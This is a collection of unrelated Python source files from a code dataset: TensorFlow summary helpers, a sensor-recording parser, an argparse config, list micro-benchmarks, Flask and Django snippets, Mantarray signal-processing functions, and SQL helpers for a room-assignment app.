add_param_summary(*summary_lists, **kwargs): """ Add summary ops for all trainable variables matching the regex, under a reused 'param-summary' name scope. This function is a no-op if not calling from main training tower. Args: summary_lists (list): each is (regex, [list of summary type]). Summary type is defined in :func:`add_tensor_summary`. collections (list[str]): collections of the summary ops. Examples: .. code-block:: python add_param_summary( ('.*/W', ['histogram', 'rms']), ('.*/gamma', ['scalar']), ) """ collections = kwargs.pop('collections', None) assert len(kwargs) == 0, "Unknown kwargs: " + str(kwargs) ctx = get_current_tower_context() if ctx is not None and not ctx.is_main_training_tower: return params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES) with cached_name_scope('param-summary'): for p in params: name = p.op.name for rgx, actions in summary_lists: if not rgx.endswith('$'): rgx = rgx + '$' if re.match(rgx, name): add_tensor_summary(p, actions, name=name, collections=collections) def add_moving_summary(*args, **kwargs): """ Add moving average summary for some tensors. This function is a no-op if not calling from main training tower. Args: args: tensors to summarize decay (float): the decay rate. Defaults to 0.95. collection (str or None): the name of the collection to add EMA-maintaining ops. The default will work together with the default :class:`MovingAverageSummary` callback. Returns: [tf.Tensor]: list of tensors returned by assign_moving_average, which can be used to maintain the EMA. 
""" decay = kwargs.pop('decay', 0.95) coll = kwargs.pop('collection', MOVING_SUMMARY_OPS_KEY) assert len(kwargs) == 0, "Unknown arguments: " + str(kwargs) ctx = get_current_tower_context() # allow ctx to be none if ctx is not None and not ctx.is_main_training_tower: return [] if tf.get_variable_scope().reuse is True: logger.warn("add_moving_summary() called under reuse=True scope, ignored.") return [] if not isinstance(args[0], list): v = args else: log_deprecated("Call add_moving_summary with positional args instead of a list!", eos="2018-02-28") v = args[0] for x in v: assert isinstance(x, (tf.Tensor, tf.Variable)), x assert x.get_shape().ndims == 0, \ "add_moving_summary() only accepts scalar tensor! Got one with {}".format(x.get_shape()) G = tf.get_default_graph() # TODO variable not saved under distributed ema_ops = [] for c in v: name = re.sub('tower[0-9]+/', '', c.op.name) # TODO colocate may affect distributed setting # colocate variable with compute op implies that the variable should be local_vars with G.colocate_with(c), tf.name_scope(None): if not c.dtype.is_floating: c = tf.cast(c, tf.float32) # assign_moving_average creates variables with op names, therefore clear ns first. with _enter_vs_reuse_ns('EMA') as vs: ema_var = tf.get_variable(name, shape=c.shape, dtype=c.dtype, initializer=tf.constant_initializer(), trainable=False) ns = vs.original_name_scope with tf.name_scope(ns): # reuse VS&NS so that EMA_1 won't appear ema_op = moving_averages.assign_moving_average( ema_var, c, decay, zero_debias=True, name=name + '_EMA_apply') ema_ops.append(ema_op) with tf.name_scope(None): # cannot add it into colocate group -- will force everything to cpus tf.summary.scalar(name + '-summary', ema_op) # write the EMA value as a summary if coll is not None: for op in ema_ops: # TODO a new collection to summary every step? tf.add_to_collection(coll, op) return ema_ops try: import scipy.misc except ImportError: from ..utils.develop import create_dummy_func create_image_summary = create_dummy_func('create_image_summary', 'scipy.misc') # noqa
StarcoderdataPython
120290
import os import glob import csv import pandas as pd import numpy as np from collections import deque from itertools import chain from utils import rotate_quat, rotate_cross_product class Sensor(object): def __init__(self, name, fieldnames, data): self.name = name self.fieldnames = fieldnames self.raw_data = data self.length = data[-1, 0] - data[0, 0] def __str__(self): return '<Sensor "{}">'.format(self.name) def __repr__(self): return str(self) def __getitem__(self, key): if isinstance(key, tuple): keys = [self.fieldnames.index(k) for k in key] else: keys = self.fieldnames.index(key) return self.raw_data[:, keys] class Recording(object): def __init__(self, path, step_stride_threshold=300): self.path = path self.sensors = [] self.subject = 'unknown' sensors_i = (p for p in glob.iglob(os.path.join(path, '*.csv')) if '-extra' not in p) for sensor_log in sensors_i: sensor_name = os.path.splitext(os.path.split(sensor_log)[-1])[0] with open(sensor_log) as f: reader = csv.reader(f) try: fieldnames = next(reader) except StopIteration: continue data = np.array([self._parse_line(fieldnames, l) for l in reader]) try: sensor = Sensor(sensor_name, fieldnames, data) except IndexError: print('Error: Empty sensor {}'.format(sensor_log)) else: setattr(self, sensor_name, sensor) self.sensors.append(sensor) if self.foot_sensors_available: self.filter_steps(step_stride_threshold) else: print('Warning: Not all foot sensors available') with open(os.path.join(path, 'meta.txt')) as f: lines = f.readlines() for l in lines: if l.startswith('now'): self.recording_start = int(l.split(' ')[-1]) * 1e-9 elif l.startswith('name'): self.subject = l.split(' ')[-1].strip() def _parse_line(self, fieldnames, l): assert len(fieldnames) == len(l), f'_parse_line({fieldnames}, {l})' for i in range(len(l)): if fieldnames[i].endswith('_ts'): value = int(l[i]) * 1e-9 elif fieldnames[i].startswith('is_') or fieldnames[i] == 'running': value = l[i] == 'true' else: value = float(l[i]) l[i] = value return l def __str__(self): return '<{} "{}" raw-sensors={}>'.format( os.path.split(self.path)[-1], self.condition, [s.name for s in self.sensors]) def __repr__(self): return str(self) def write(self, file_name): # sensors = {s.name: s.raw_data for s in self.sensors} # sensors['merged'] = self.merged # np.savez_compressed(os.path.join(self.path, file_name), # **sensors) self.merged.to_msgpack(os.path.join(self.path, file_name)) def merge(self, step_margin=1.): data_sensors = self.data_sensors arrivals = [s['arrival_ts'] for s in data_sensors] idc = [0] * len(data_sensors) qs = [deque(maxlen=1) for _ in data_sensors] result = deque() try: while True: # fill queues with newest data point new_arr = [s[idc[i]] for i, s in enumerate(arrivals)] newest = np.argmin(new_arr) qs[newest].append(data_sensors[newest].raw_data[idc[newest]]) idc[newest] += 1 # check if all queues contain data if all([len(q) > 0 for q in qs]): # create new data point containing all sensor data # assign average timestamp avg_timestamp = np.mean([q[0][0] for q in qs]) label = self.label_for_timestamp(avg_timestamp, step_margin) data = [avg_timestamp, label] # append sensor data: data fields [2:6] data += list(chain(*(q.popleft()[2:6] for q in qs))) result.append(data) except IndexError: pass cols = ['event_ts', 'label'] for s in data_sensors: cols += ['{}_{}'.format(s.name, fn) for fn in s.fieldnames[2:6]] self.merged = pd.DataFrame.from_records(list(result), columns=cols) @property def data_sensors(self): label_sensor_names = ('RightFootSensor', 'LeftFootSensor') return [s 
for s in self.sensors if s.name not in label_sensor_names and '-extra' not in s.name] @property def foot_sensors_available(self): return hasattr(self, 'RightFootSensor') and hasattr(self, 'LeftFootSensor') def label_for_timestamp(self, timestamp, step_margin=1.): '''TODO DOCS''' if not self.foot_sensors_available: return False for s in (self.RightFootSensor, self.LeftFootSensor): arrivals = s['arrival_ts'] ts_idx = np.searchsorted(arrivals, timestamp) step_durations = s['duration'] * 1e-3 if ts_idx < step_durations.shape[0]: step_start_ts = arrivals[ts_idx] - step_durations[ts_idx] - step_margin # print(arrivals[ts_idx + 1], step_durations[ts_idx + 1], step_start_ts, timestamp) if timestamp >= step_start_ts: # print('in') # step_start_ts <= timestamp <= step_arrival return True return False def rotate_accelerometer(self): acc = self.merged.as_matrix(['Accelerometer_val_x', 'Accelerometer_val_y', 'Accelerometer_val_z']) rot = self.merged.as_matrix(['GameRotationVector_val_w', 'GameRotationVector_val_x', 'GameRotationVector_val_y', 'GameRotationVector_val_z']) if np.isnan(rot).any(): print('WARNING: GameRotationVector data unavailable. Fallback to RotationVector.') rot = self.merged.as_matrix(['RotationVector_val_w', 'RotationVector_val_x', 'RotationVector_val_y', 'RotationVector_val_z']) if np.isnan(rot).any(): raise ValueError('No RotationVector data available. Cannot rotate accelerometer.') keys = 'Rotated_Accelerometer_val_x', 'Rotated_Accelerometer_val_y', 'Rotated_Accelerometer_val_z' rot_acc = rotate_quat(acc, rot) self.merged = self.merged.assign(**{keys[i]: rot_acc[:, i] for i in range(len(keys))}) def normalize_accelerometer(self, norm_reference): acc = self.merged.as_matrix(['Accelerometer_val_x', 'Accelerometer_val_y', 'Accelerometer_val_z']) rot = self.merged.as_matrix(['GameRotationVector_val_w', 'GameRotationVector_val_x', 'GameRotationVector_val_y', 'GameRotationVector_val_z']) if np.isnan(rot).any(): print('WARNING: GameRotationVector data unavailable. Fallback to RotationVector.') rot = self.merged.as_matrix(['RotationVector_val_w', 'RotationVector_val_x', 'RotationVector_val_y', 'RotationVector_val_z']) if np.isnan(rot).any(): raise ValueError('No RotationVector data available. Cannot rotate accelerometer.') keys = 'Normalized_Accelerometer_val_x', 'Normalized_Accelerometer_val_y', 'Normalized_Accelerometer_val_z' rot_acc = rotate_quat(acc, rot) rot_acc[:, 2] -= 9.8 rot_acc /= norm_reference self.merged = self.merged.assign(**{keys[i]: rot_acc[:, i] for i in range(len(keys))}) def filter_steps(self, th): for s in (self.RightFootSensor, self.LeftFootSensor): step_data = s['stride_x', 'stride_y'] step_norm = np.linalg.norm(step_data, axis=1) print('{}: {} steps detected as too small'.format(s.name, np.sum(step_norm < th))) s.raw_data = s.raw_data[step_norm >= th]
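# Usage sketch (not in the original source; assumes `recordings/subject01` is
# a recording directory laid out as this module expects, with per-sensor CSV
# logs plus a meta.txt):
#
# rec = Recording("recordings/subject01", step_stride_threshold=300)
# rec.merge(step_margin=1.0)        # builds the rec.merged DataFrame
# rec.rotate_accelerometer()        # adds Rotated_Accelerometer_* columns
# rec.write("merged.msg")           # saves the merged frame as msgpack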
StarcoderdataPython
140115
<filename>scripts/args.py<gh_stars>0
"""
Module for the argument parser.

Many of the arguments are from Huggingface's run_squad example:
https://github.com/huggingface/transformers/blob/7972a4019f4bc9f85fd358f42249b90f9cd27c68/examples/run_squad.py
"""

import argparse
import os

args = argparse.ArgumentParser(description='nmt translation')

args.add_argument('--experiment',
                  type=str,
                  default='testing',
                  help='name of experiment')
args.add_argument('--save_dir',
                  type=str,
                  default='results',
                  help='directory to save results')
args.add_argument('--plots_dir',
                  type=str,
                  default='plot',
                  help='directory to save plots')
args.add_argument('--seed',
                  type=int,
                  default=42,
                  help='random seed')
args.add_argument('--run_log',
                  type=str,
                  default=os.path.join(os.getcwd(), 'log'),
                  help='where to print run log')
args.add_argument('--access_mode',
                  type=int,
                  default=0o777,
                  help='access mode of files created')

# =============================================================================
# for dataloading
# =============================================================================
args.add_argument('--data_dir',
                  type=str,
                  default='data',
                  help='directory storing all data')
args.add_argument('--batch_size',
                  type=int,
                  default=8,
                  help='batch size')
# args.add_argument('--longest_label',
#                   type=int,
#                   default=1,
#                   help='longest label')
args.add_argument('--source_name',
                  type=str,
                  default='vi',
                  help='source language name')
args.add_argument('--target_name',
                  type=str,
                  default='en',
                  help='target language name')

# =============================================================================
# for training
# =============================================================================
StarcoderdataPython
3359533
<filename>pybench/Lists.py # Ignore flake8 E741 warning in the whole file: # flake8: noqa import pyperf from six.moves import xrange from pybench import Test class SimpleListManipulation(Test): version = 2.0 operations = 5 * (6 + 6 + 6) inner_loops = 5 def test(self, loops): l = [] append = l.append range_it = xrange(loops) t0 = pyperf.perf_counter() for _ in range_it: append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 x = l[0] x = l[1] x = l[2] x = l[3] x = l[4] x = l[5] append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 x = l[0] x = l[1] x = l[2] x = l[3] x = l[4] x = l[5] append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 x = l[0] x = l[1] x = l[2] x = l[3] x = l[4] x = l[5] append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 x = l[0] x = l[1] x = l[2] x = l[3] x = l[4] x = l[5] append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 x = l[0] # noqa x = l[1] # noqa x = l[2] # noqa x = l[3] # noqa x = l[4] # noqa x = l[5] # noqa if len(l) > 10000: # cut down the size del l[:] return pyperf.perf_counter() - t0 class ListSlicing(Test): version = 2.0 operations = 25 * (3 + 1 + 2 + 1) def test(self, loops): n = list(range(100)) r = list(range(25)) range_it = xrange(loops) t0 = pyperf.perf_counter() for _ in range_it: l = n[:] for j in r: m = l[50:] # noqa m = l[:25] # noqa m = l[50:55] # noqa l[:3] = n # noqa m = l[:-1] # noqa m = l[1:] # noqa l[-1:] = n # noqa return pyperf.perf_counter() - t0 class SmallLists(Test): version = 2.0 operations = 5 * (1 + 6 + 6 + 3 + 1) inner_loops = 5 def test(self, loops): range_it = xrange(loops) t0 = pyperf.perf_counter() for _ in range_it: l = [] append = l.append append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 l[:3] = [1, 2, 3] m = l[:-1] m = l[1:] l[-1:] = [4, 5, 6] l = [] append = l.append append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 l[:3] = [1, 2, 3] m = l[:-1] m = l[1:] l[-1:] = [4, 5, 6] l = [] append = l.append append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 l[:3] = [1, 2, 3] m = l[:-1] m = l[1:] l[-1:] = [4, 5, 6] l = [] append = l.append append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 l[:3] = [1, 2, 3] m = l[:-1] m = l[1:] l[-1:] = [4, 5, 6] l = [] append = l.append append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 l[:3] = [1, 2, 3] m = l[:-1] m = l[1:] # noqa l[-1:] = [4, 5, 6] return pyperf.perf_counter() - t0 class SimpleListComprehensions(Test): version = 2.0 operations = 6 inner_loops = 2 def test(self, loops): n = list(range(10)) * 10 range_it = xrange(loops) t0 = pyperf.perf_counter() for _ in range_it: l = [x for x in n] l = [x for x in n if x] l = [x for x in n if not x] l = [x for x in n] l = [x for x in n if x] l = [x for x in n if not x] # noqa return pyperf.perf_counter() - t0 class NestedListComprehensions(Test): version = 2.0 operations = 6 def test(self, loops): m = list(range(10)) n = list(range(10)) range_it = xrange(loops) t0 = pyperf.perf_counter() for _ in range_it: l = [x for x in n for y in m] l 
= [y for x in n for y in m] l = [x for x in n for y in m if y] l = [y for x in n for y in m if x] l = [x for x in n for y in m if not y] l = [y for x in n for y in m if not x] # noqa return pyperf.perf_counter() - t0
from flask_wtf import FlaskForm
from wtforms import (
    TextField, IntegerField, HiddenField, SubmitField, validators
)


class MonkeyForm(FlaskForm):
    id = HiddenField()
    name = TextField('Name', validators=[validators.InputRequired()])
    age = IntegerField(
        'Age',
        validators=[
            validators.InputRequired(message='Age should be an integer.'),
            validators.NumberRange(min=0)
        ]
    )
    email = TextField(
        'Email',
        validators=[validators.InputRequired(), validators.Email()]
    )
    submit_button = SubmitField('Submit')
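
# A minimal sketch of wiring a form like MonkeyForm into a Flask view. The
# route, template name, and save_monkey() helper are assumptions for
# illustration only; MonkeyForm itself is the class defined above.
from flask import Flask, redirect, render_template, url_for

app = Flask(__name__)
app.config['SECRET_KEY'] = 'change-me'  # Flask-WTF needs this for CSRF


@app.route('/monkeys/new', methods=['GET', 'POST'])
def new_monkey():
    form = MonkeyForm()
    if form.validate_on_submit():  # POST request and all validators passed
        # save_monkey(form.name.data, form.age.data, form.email.data)
        return redirect(url_for('new_monkey'))
    # On GET, or on validation failure, re-render with form.errors populated.
    return render_template('monkey_form.html', form=form)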
from django.apps import AppConfig


class OficinaConfig(AppConfig):
    name = 'oficina'
# -*- coding: utf-8 -*-
"""Transforming arrays of Mantarray data throughout the analysis pipeline."""
from typing import Any
from typing import Dict
from typing import List
from typing import Union
import uuid

from nptyping import NDArray
import numpy as np
from scipy import signal

from .constants import ADC_GAIN
from .constants import BESSEL_BANDPASS_UUID
from .constants import BESSEL_LOWPASS_10_UUID
from .constants import BESSEL_LOWPASS_30_UUID
from .constants import BUTTERWORTH_LOWPASS_30_UUID
from .constants import MICRO_TO_BASE_CONVERSION
from .constants import MILLI_TO_BASE_CONVERSION
from .constants import MILLIMETERS_PER_MILLITESLA
from .constants import MILLIVOLTS_PER_MILLITESLA
from .constants import NEWTONS_PER_MILLIMETER
from .constants import RAW_TO_SIGNED_CONVERSION_VALUE
from .constants import REFERENCE_VOLTAGE
from .exceptions import FilterCreationNotImplementedError
from .exceptions import UnrecognizedFilterUuidError

FILTER_CHARACTERISTICS: Dict[uuid.UUID, Dict[str, Union[str, float, int]]] = {
    BESSEL_BANDPASS_UUID: {
        "filter_type": "bessel",
        "order": 4,
        "high_pass_hz": 0.1,
        "low_pass_hz": 10,
    },
    BESSEL_LOWPASS_10_UUID: {"filter_type": "bessel", "order": 4, "low_pass_hz": 10},
    BESSEL_LOWPASS_30_UUID: {"filter_type": "bessel", "order": 4, "low_pass_hz": 30},
    BUTTERWORTH_LOWPASS_30_UUID: {
        "filter_type": "butterworth",
        "order": 4,
        "low_pass_hz": 30,
    },
}


def create_filter(
    filter_uuid: uuid.UUID,
    sample_period_microseconds: int,
) -> NDArray[(Any, Any), float]:
    """Create a filter to apply to data streams.

    Args:
        filter_uuid: a UUID of an already accepted and approved filter
        sample_period_microseconds: the sampling period for the data stream
            you want to apply the filter to

    Returns:
        The scipy second-order sections ('sos') array to use in
        scipy.signal.sosfiltfilt
    """
    sampling_frequency_hz = 1 / (sample_period_microseconds / MICRO_TO_BASE_CONVERSION)
    nyquist_frequency_limit = sampling_frequency_hz / 2

    if filter_uuid not in FILTER_CHARACTERISTICS:
        raise UnrecognizedFilterUuidError(filter_uuid)
    the_filter_characteristics = FILTER_CHARACTERISTICS[filter_uuid]
    normalized_high_pass_frequency: Union[int, float]
    normalized_low_pass_frequency: Union[int, float]
    filter_order: int
    if "order" in the_filter_characteristics:
        if not isinstance(the_filter_characteristics["order"], int):
            raise NotImplementedError("The filter order must always be an int.")
        filter_order = the_filter_characteristics["order"]
    pass_boundaries: List[Union[float, int]] = list()
    bandpass_type = "lowpass"  # by default
    if "high_pass_hz" in the_filter_characteristics:
        if isinstance(the_filter_characteristics["high_pass_hz"], str):
            raise NotImplementedError("The high pass frequency should never be a string.")
        normalized_high_pass_frequency = the_filter_characteristics["high_pass_hz"] / nyquist_frequency_limit
        pass_boundaries.append(normalized_high_pass_frequency)
    if "low_pass_hz" in the_filter_characteristics:
        if isinstance(the_filter_characteristics["low_pass_hz"], str):
            raise NotImplementedError("The low pass frequency should never be a string.")
        normalized_low_pass_frequency = the_filter_characteristics["low_pass_hz"] / nyquist_frequency_limit
        pass_boundaries.append(normalized_low_pass_frequency)

    if len(pass_boundaries) == 2:
        bandpass_type = "bandpass"
    filter_type = the_filter_characteristics["filter_type"]
    if filter_type == "bessel":
        sos_polys = signal.bessel(filter_order, pass_boundaries, btype=bandpass_type, output="sos")
    elif filter_type == "butterworth":
        sos_polys = signal.butter(filter_order, pass_boundaries, btype=bandpass_type, output="sos")
    else:
        raise FilterCreationNotImplementedError(filter_uuid)

    if not isinstance(sos_polys, NDArray[float]):
        raise NotImplementedError("Returned polynomials must be float arrays")
    return sos_polys


def apply_sensitivity_calibration(raw_gmr_reading: NDArray[(2, Any), int]) -> NDArray[(2, Any), int]:
    """Apply the result of a sensor sensitivity calibration.

    Actual sensitivity calibration will be performed once information
    obtained from Jason.

    Args:
        raw_gmr_reading: an original 2D array of time vs GMR readings.
            Could be from tissue construct or reference sensor.

    Returns:
        A 2D array of the time vs GMR readings after sensitivity
        calibration. Data will be rounded to integers if calibration
        results in slight decimal behavior.
    """
    return raw_gmr_reading


def noise_cancellation(
    tissue_gmr_reading: NDArray[(2, Any), int],
    reference_gmr_reading: NDArray[
        (2, Any), int
    ],  # pylint: disable=unused-argument # this will eventually be used
) -> NDArray[(2, Any), int]:
    """Perform cancellation of ambient magnetic noise using reference sensor.

    This should be performed after sensitivity calibration has been applied
    to the raw data from each sensor.

    Args:
        tissue_gmr_reading: from the tissue construct sensor
        reference_gmr_reading: from the reference sensor

    Returns:
        A single 2D array of time vs GMR reading.
    """
    return tissue_gmr_reading


def apply_empty_plate_calibration(
    noise_cancelled_gmr: NDArray[(2, Any), int],
) -> NDArray[(2, Any), int]:
    """Apply the result of an empty plate calibration.

    Actual empty plate calibration will be performed once information
    obtained from Jason.

    Args:
        noise_cancelled_gmr: a 2D array of Time and GMR readings after
            combining reference and tissue sensor readings.

    Returns:
        A 2D array of the Time and GMR readings after empty plate
        calibration. Data will be rounded to integers if calibration
        results in slight decimal behavior.
    """
    return noise_cancelled_gmr


def apply_noise_filtering(
    fully_calibrated_gmr: NDArray[(2, Any), int],
    scipy_filter_sos_coefficients: NDArray[(Any, Any), float],
) -> NDArray[(2, Any), int]:
    """Apply noise filtering to the fully calibrated data.

    Args:
        fully_calibrated_gmr: a 2D array of Time and GMR readings after
            applying the Empty Plate calibration.
        scipy_filter_sos_coefficients: The 'second-order sections'
            coefficient array that scipy filters generate when created

    Returns:
        A 2D array of the Time and GMR readings after noise filtering.
        Data will be rounded to integers if filtering results in slight
        decimal behavior.
    """
    time_readings = fully_calibrated_gmr[0, :]
    gmr_readings = fully_calibrated_gmr[1, :]
    float_array = signal.sosfiltfilt(scipy_filter_sos_coefficients, gmr_readings)
    int_array = np.rint(float_array).astype(np.int32)
    filtered_data: NDArray[(2, Any), int] = np.vstack((time_readings, int_array))
    return filtered_data


def calculate_voltage_from_gmr(
    gmr_data: NDArray[(2, Any), int],
    reference_voltage: Union[float, int] = REFERENCE_VOLTAGE,
    adc_gain: int = ADC_GAIN,
) -> NDArray[(2, Any), np.float64]:
    """Convert 'signed' 24-bit values from an ADC to measured voltage.

    Conversion values were obtained 03/09/2021 by <NAME>

    Args:
        gmr_data: time and GMR numpy array. Typically coming from
            filtered_gmr_data
        reference_voltage: Almost always leave as default of 2.5V
        adc_gain: Current implementation of Mantarray is constant value
            of 2, but may change in the future

    Returns:
        A 2D array of time vs Voltage
    """
    millivolts_per_lsb = 1000 * reference_voltage / RAW_TO_SIGNED_CONVERSION_VALUE
    sample_in_millivolts = gmr_data[1, :].astype(np.float64) * millivolts_per_lsb * (1 / adc_gain)
    sample_in_volts = sample_in_millivolts / MILLI_TO_BASE_CONVERSION
    return np.vstack((gmr_data[0, :].astype(np.float64), sample_in_volts))


def calculate_displacement_from_voltage(
    voltage_data: NDArray[(2, Any), np.float64],
) -> NDArray[(2, Any), np.float64]:
    """Convert voltage to displacement.

    Conversion values were obtained 03/09/2021 by <NAME>

    Args:
        voltage_data: time and Voltage numpy array. Typically coming from
            calculate_voltage_from_gmr

    Returns:
        A 2D array of time vs Displacement (meters)
    """
    sample_in_millivolts = voltage_data[1, :] * MILLI_TO_BASE_CONVERSION
    time = voltage_data[0, :]

    # calculate magnetic flux density
    sample_in_milliteslas = sample_in_millivolts / MILLIVOLTS_PER_MILLITESLA

    # calculate displacement
    sample_in_millimeters = sample_in_milliteslas * MILLIMETERS_PER_MILLITESLA
    sample_in_meters = sample_in_millimeters / MILLI_TO_BASE_CONVERSION

    return np.vstack((time, sample_in_meters)).astype(np.float64)


def calculate_force_from_displacement(
    displacement_data: NDArray[(2, Any), np.float64],
    in_mm: bool = True,
) -> NDArray[(2, Any), np.float64]:
    """Convert displacement to force.

    Conversion values were obtained 03/09/2021 by <NAME>

    Args:
        displacement_data: time and Displacement numpy array. Typically
            coming from calculate_displacement_from_voltage or the magnet
            finding alg
        in_mm: whether this data is in units of mm or not. If coming from
            calculate_displacement_from_voltage, it is likely in meters and
            this value should be set to False

    Returns:
        A 2D array of time vs Force (Newtons)
    """
    displacement = displacement_data[1, :]
    if not in_mm:
        displacement *= MILLI_TO_BASE_CONVERSION
    time = displacement_data[0, :]

    # calculate force
    sample_in_newtons = displacement * NEWTONS_PER_MILLIMETER
    return np.vstack((time, sample_in_newtons)).astype(np.float64)
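
# A minimal end-to-end sketch of the pipeline above, assuming a 100 Hz
# stream (10_000 µs sample period) and synthetic GMR data. Everything except
# the function names and BESSEL_LOWPASS_30_UUID is made up for illustration,
# and the module's relative imports are left implicit.
import numpy as np

sos = create_filter(BESSEL_LOWPASS_30_UUID, sample_period_microseconds=10_000)

time_us = np.arange(0, 1_000_000, 10_000)  # 100 samples, one second of data
gmr = np.random.default_rng(0).integers(-1_000, 1_000, size=time_us.size)
raw = np.vstack((time_us, gmr))

filtered = apply_noise_filtering(raw, sos)
voltage = calculate_voltage_from_gmr(filtered)
displacement = calculate_displacement_from_voltage(voltage)  # meters
force = calculate_force_from_displacement(displacement, in_mm=False)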
<filename>ruddock/modules/hassle/helpers.py import flask import sqlalchemy alleys = [1, 2, 3, 4, 5, 6] def get_all_members(): """Gets all current members (potential hassle participants).""" query = sqlalchemy.text(""" SELECT user_id, name, graduation_year, member_type, membership_desc, user_id IN ( SELECT user_id FROM hassle_participants ) AS participating FROM members NATURAL JOIN members_extra NATURAL JOIN members_current NATURAL JOIN membership_types ORDER BY member_type, graduation_year, name """) return flask.g.db.execute(query).fetchall() def get_rising_members(): """Gets IDs for all current frosh, sophomores, and juniors.""" query = sqlalchemy.text(""" SELECT user_id FROM members NATURAL JOIN members_current WHERE member_type = 1 AND CONCAT(graduation_year, '-07-01') > NOW() + INTERVAL 1 YEAR """) return flask.g.db.execute(query).fetchall() def get_frosh(): """Gets IDs for all current frosh.""" query = sqlalchemy.text(""" SELECT user_id FROM members NATURAL JOIN members_current WHERE member_type = 1 AND CONCAT(graduation_year, '-07-01') > NOW() + INTERVAL 3 YEAR """) return flask.g.db.execute(query).fetchall() def get_participants(): """Gets all members participating in the hassle.""" query = sqlalchemy.text(""" SELECT user_id, name, graduation_year, member_type, membership_desc FROM members NATURAL JOIN members_extra NATURAL JOIN hassle_participants NATURAL JOIN membership_types ORDER BY member_type, graduation_year, name """) return flask.g.db.execute(query).fetchall() def get_available_participants(): """Gets all participants who have not yet picked a room.""" query = sqlalchemy.text(""" SELECT user_id, name FROM members NATURAL JOIN members_extra NATURAL JOIN hassle_participants WHERE user_id NOT IN ( SELECT user_id FROM hassle_events UNION SELECT roommate_id FROM hassle_roommates ) ORDER BY name """) return flask.g.db.execute(query).fetchall() def set_participants(participants): """Sets hassle participants.""" # Delete old participants. delete_query = sqlalchemy.text("DELETE FROM hassle_participants") flask.g.db.execute(delete_query) # Insert new participants. insert_query = sqlalchemy.text(""" INSERT INTO hassle_participants (user_id) VALUES (:p) """) for participant in participants: flask.g.db.execute(insert_query, p=participant) def get_all_rooms(): """Gets all rooms in the house.""" query = sqlalchemy.text(""" SELECT room_number, alley, room_number IN ( SELECT room_number FROM hassle_rooms ) AS participating FROM rooms ORDER BY room_number """) return flask.g.db.execute(query).fetchall() def get_participating_rooms(): """Gets all rooms participating in the hassle.""" query = sqlalchemy.text(""" SELECT room_number, alley FROM hassle_rooms NATURAL JOIN rooms ORDER BY room_number """) return flask.g.db.execute(query).fetchall() def get_available_rooms(): """Gets all rooms that have not been picked.""" query = sqlalchemy.text(""" SELECT room_number, alley FROM hassle_rooms NATURAL JOIN rooms WHERE room_number NOT IN ( SELECT room_number FROM hassle_events ) ORDER BY room_number """) return flask.g.db.execute(query).fetchall() def get_rooms_remaining(): """ Gets the number of rooms remaining for each alley. Returns a dict mapping alley to number of remaining rooms. """ alley_counts = dict(zip(alleys, [0] * len(alleys))) available_rooms = get_available_rooms() for room in available_rooms: alley_counts[room['alley']] += 1 return alley_counts def set_rooms(rooms): """Sets rooms available for hassle.""" # Delete old rooms. 
delete_query = sqlalchemy.text("DELETE FROM hassle_rooms") flask.g.db.execute(delete_query) # Insert rooms insert_query = sqlalchemy.text("INSERT INTO hassle_rooms (room_number) VALUES (:r)") for room in rooms: flask.g.db.execute(insert_query, r=room) def get_events(): """Returns events in the hassle.""" query = sqlalchemy.text(""" SELECT hassle_event_id, members.user_id, name, hassle_events.room_number, alley FROM hassle_events JOIN members ON hassle_events.user_id = members.user_id JOIN members_extra ON hassle_events.user_id = members_extra.user_id JOIN rooms ON hassle_events.room_number = rooms.room_number ORDER BY hassle_event_id """) return flask.g.db.execute(query).fetchall() def get_events_with_roommates(): """Returns events with additional roommate information.""" events = get_events() results = [] for event in events: row_dict = dict(event.items()) roommates = get_roommates(event['user_id']) row_dict['roommates'] = roommates occupant_names = [event['name']] for roommate in roommates: occupant_names.append(roommate['name']) row_dict['occupants'] = ', '.join(occupant_names) results.append(row_dict) return results def new_event(user_id, room_number, roommates): """Inserts a new event into the database.""" # Insert event. query = sqlalchemy.text(""" INSERT INTO hassle_events (user_id, room_number) VALUES (:u, :r) """) flask.g.db.execute(query, u=user_id, r=room_number) # Insert roommates. query = sqlalchemy.text(""" INSERT INTO hassle_roommates (user_id, roommate_id) VALUES (:u, :r) """) for roommate in roommates: flask.g.db.execute(query, u=user_id, r=roommate) def clear_events(event_id=None): """ Clears hassle events. If event_id is provided, all events after (not including) the provided event are cleared. Otherwise, everything is cleared. """ if event_id: query = sqlalchemy.text(""" DELETE FROM hassle_roommates WHERE user_id IN ( SELECT user_id FROM hassle_events WHERE hassle_event_id >= :e )""") flask.g.db.execute(query, e=event_id) query = sqlalchemy.text("DELETE FROM hassle_events WHERE hassle_event_id >= :e") flask.g.db.execute(query, e=event_id) else: flask.g.db.execute(sqlalchemy.text("DELETE FROM hassle_roommates")) flask.g.db.execute(sqlalchemy.text("DELETE FROM hassle_events")) def get_roommates(user_id): """Gets all roommates for the provided user.""" query = sqlalchemy.text(""" SELECT roommate_id, name FROM hassle_roommates JOIN members ON hassle_roommates.roommate_id = members.user_id JOIN members_extra ON members.user_id = members_extra.user_id WHERE hassle_roommates.user_id=:u ORDER BY name """) return flask.g.db.execute(query, u=user_id).fetchall() def clear_all(): """Clears all current hassle data.""" 